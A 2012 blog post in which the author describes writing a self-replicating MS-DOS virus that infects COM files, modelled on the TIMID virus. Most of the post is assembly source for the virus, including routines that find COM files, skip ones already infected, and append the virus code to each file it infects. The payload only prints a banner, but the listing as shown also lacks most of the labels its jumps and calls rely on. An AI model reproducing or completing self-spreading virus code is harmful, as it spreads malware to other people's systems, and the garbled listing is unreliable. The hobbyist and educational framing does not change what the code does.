Tuesday, August 28, 2012

Writing my First Computer Virus

I write this, in part, as a nod to Herm1t over at VX Heavens, which has recently been shutdown by the Ukrainian government. Computer viruses, and computer virology are best explored in a safe and controlled environment, and it is our right as researchers to do so. VX Heavens has shared wonderful information for 2 decades, affecting the industry in positive ways that we'll never see the end of.

Those who know me very well know that one of the primary reasons for my learning how to write software, was to write computer viruses. Those who don't know me extremely well may mistakenly assume this was for malicious reasons. It was not, it's somewhat of a secret but there was a time in my life when I was not good with computers at all. If you really want to know why I decided to I wanted to write viruses, you'll just have to ask me in person, because it's somewhat of a personal story for me and it's kind of too dumb to get into here.

For the rest of you who don't care, here's a story about the first, ever, computer virus I've written! To be clear this is a virus in a stricter definition than the public tends to use. This virus infects COM files (yeah, remember those?) and runs in a fairly confined environment (it's current directory). It has no malicious content, with the exception of possibly violating Title 13-2316 paragraphs 2 & 3 (Arizona Title 13-2316). Which of course requires it to be occurring without permissions. Since I'm writing it and keeping it in a virtual machine it pretty much means I'm 100% in the clear. So now that the legal stuff is out of the way, let's talk implementation.

The system I am interested in developing in will be a MS-DOS 6.22 system. I'll be running it in a virtual machine which I will leave the setup as an exercise for the dedicated student. Next I will employ the assembling prowess of the Flat Assembler (FASM). This computer virus is heavily based on the TIMID virus described by Dr. Mark Allen Ludwig in his "The Little Black Book of Computer Viruses." (Amazon)

So let's begin, a little theory seems a good start.

COM files are flat files that are loaded into memory directly. The first bytes (offset 0x0000) are loaded into offset 0x100 in memory and then up. The reason for the 256 byte offset is a throwback to the CP/M operating system called the Program Segment Prefix (PSP).  For the particularly curious Wikipedia has a fairly well rounded article here.

Viruses may have several goals and these goals are up to the implementer to choose. For instance, the number 1 priority may be to replicate itself. A reasonable number 2 priority may be to survive. Since I'm really just interested in the fundamentals of virology we'll stick with focusing merely on this number 1 priority - Replication.

The virus, in order to replicate has many options. It may attach itself to the beginning of a file, or to the end, or break itself up and spread itself around in the file (e.g. CIH). Inserting into the start of COM file is difficult if there are any absolute offsets used in the program, as this will shift all of these offsets. And breaking it up, is obviously the most complicated option, though likely one of the best to subvert detection.

Basically, this is my first virus so we'll stick with the easiest, inserting the virus at the end of the COM file.

We'll need a few things:

  1. A routine which will identify potential files to infect. 
  2. A routine to perform the infection while preserving enough information to reconstruct the original code to continue to execute effectively.
  3. A payload (may be as simple as just a ret), we'll use a print call when infecting, same as TIMID.

A common issue is that the viral code, when attached to the end of a file will regularly appear in a different location in memory. So we can not rely on too many absolute addresses (with a few exceptions related to the operating system (e.g. the PSP mentioned above). My solution involves determining the current code location and then referencing data members at a regular offset from there, this is probably the most notable variation of TIMID, and the rest is largely the same.

I use various DOS syscall methods, one of the most important is setting up a temporary Disk Transfer Area (DTA) which holds the file handles and data while we read and write files. For a reference to the other DOS syscalls see here.

;Origin is 0x100 - This is for COM files, which include
; a 256 byte PSP (Program Segment Prefix)
org 0x100

        jmp     near virus        ;Make it look like this file is infected.
                db 'Vx'
        sub     esp, 0x80        ; new DTA space.
        mov     ebp, esp         ; ebp will point to our DTA       
        lea     dx, [esp]        ; address for new DTA
        mov     ah, 0x1A         ; set DTA
        int     0x21             ; syscall, create new DTA space.

        call    get_start        ;
        pop     si               ; pull the EIP from the stack, this is our location.
        sub     si, get_start    ; si is ready to handle offsets to the data section

        call    find_file        ; Find an infectable file.
        jnz     fin              ; Failed to find a file, bail.       
        call    infect           ; Infect the file!        
        push    si               ; Reimage the host bytes
        lea     si, [si+HOST_IMAGE]      
        lea     di, [0x100]      ; Default starting position      
        mov     cx, 0x05         ; Number of bytes to image
        rep     movs  BYTE [di], [si]    ; Copy 5 bytes from *si to *di
        pop     si               ; Restore si

        mov     dx, 0x80            ; reset to use default DTA
        mov     ah, 0x1A            ; set DTA function
        int     0x21                ; syscall

        mov     esp, 0xFFFF         ; 
        mov     ebp, esp            ; Restore the stack

        push    0x100               ; push the "new" return address

;Find infectable files.
        lea     dx, [si + files]        ; searching COM files
        mov     ah, 0x4E                ; search function id
                mov     cl, 0x06        ; attribute mask
                int     0x21            ; syscall
                or      al, al          ; checking success: non-zero return (success)
                jnz     done            ; on failure, no file found we're done.
                call    check_file      ; check if this file is infectable
                jz      done            ; file is infectable, return to main
                mov     ah, 0x4F        ; file was not infectable, search next (function id)
                jmp     ff_loop         ;   --

  ;First we check the size of the file to ensure our virus can fit in it!
        push   dx
        xor     bx, bx                  ; Clear bx, this represents our soon to be file handle.
        mov    ax, [ebp + 26]              ; Value @ Defaut DTA + offset to file size
        cmp    ax, 0x05                    ; Make sure it's *atleast* 5 bytes
        jl      bad_file                ; File is too small!
        add     ax, end_file - start_file + 0x100       ; End of virus - start of virus + size of PSP
        jc      bad_file                ; File is too big to accommodate this virus.
        mov     ax, 0x3D02              ; Open file with read/write
        lea     dx, [ebp + 30]          ; Default DTA + offset of file name
        int     0x21                    ; open file.       
        jc      bad_file                ; failed to open file?

        mov     bx, ax                  ; Open succeeded, file handle is in bx.
        mov     ah, 0x3F                ; Read file
        mov     cx, 0x05                ; 5 bytes worth
        lea     di, [si + START_IMAGE]  ; load the effective address of the start_image
        mov     dx, di                  ; dx is actually used in the sycall.
        int     0x21                    ; syscall
        jc      bad_file                ; error, and we've already ruled out partial reads (less than 5)

        ;------Ensure the file is not already infected.
        cmp     BYTE [di], 0xE9         ; Check for the jmp near.
        jne     good_file               ; It wasn't, so it's not infected.
        cmp     WORD [di+3], 0x7856     ; Check for 'Vx'
        je      bad_file                ; The file was infected, next file.

                pop     dx              ; Restore registers
                xor     al, al          ; Return status is good
                ret                     ; Return to caller with the file in the DTA.

                or      bx, bx          ; Checking for a file handle
                jz      no_handle       ; no handle to close
                mov     ah, 0x3E        ; close file
                int     0x21            ; syscall - close the file.
                        pop     dx      ; Restore registers
                        mov     al, 0x01; Return status is no file found
                        or      al, al  ; Set flags for status check
                        ret             ; Return to caller with no file found.
;Infect, copy mechanism
        ;At this point the file is still open, the handle is in bx.
        lea     di, [ ebp + 26]         ; size of com file being infected
        mov     ax, [di]
        mov     cx, ax      
        lea     di, [si + START_VIR + 1]; The jmp offset
        sub     cx, 0x03                ; Remove the near jmp size. 
        mov     [di], cx                ; the offset to jmp to

        xor     ax, ax                  ; Seek to start
        mov     cx, ax
        xor     dx, dx
        mov     ah, 0x42            ; start of file
        int     0x21                ; syscall        

        mov     ah, 0x40            ; write to file
        mov     cx, 0x05            ; writing 5 bytes.
        lea     dx, [si + START_VIR]
        int     0x21                ; write file

        xor     ax, ax              ; Seek to end
        mov     cx, ax
        xor     dx, dx
        mov     ax, 0x4202          ; end of file
        int     0x21                ; syscall

        mov     ah, 0x40
        mov     cx, end_file - virus;size of virus
        sub     cx, 0x05            ; Write all but 5 bytes, this will get start_image
        lea     dx, [si + virus]    ; virus beginning        
        int     0x21                ; copy the virus out!

        mov     ah, 0x40            ; do another write to give HOST_IMAGE
        lea     dx, [si + START_IMAGE]  ; to the newly infected file.
        mov     cx, 0x05            ; Just 5 bytes.
        int     0x21                ;

        mov     ah, 0x3E            ;close file
        int     0x21                ;syscall

        push    dx                  ; print infection message
        lea     dx, [si + banner]
        call    print
        pop     dx

;Helper methods, these'll go away in the final product
        push    ax         ; Makes this function non-destructive.
        mov     ah, 0x09   ; Print ASCIIZ
        int     0x21       ; print whatever is in ds:dx, this is for debugging
        pop     ax         ; Restore registers    
        ret                ; Return to caller
;Data Section
        banner          db 'Catatonic says "Hi!"', 0x0D, 0x0A, 0x24
        files           db '*.COM', 0x00
        START_VIR       db 0xE9, 2 dup(?), 'Vx'
        START_IMAGE     db 0x05 dup(?)
        HOST_IMAGE      db 0xB8, 0x00, 0x4C, 0xCD, 0x21 ; simple exit program.

That's it! Sorry I'm not going more in depth on the specifics - this post is several months old for me now and I figured it'd just push it out instead of breaking it up or other things.

I believe this source code is good (if i recall correctly) and here is a screen shot of the results:

Have fun and stay safe!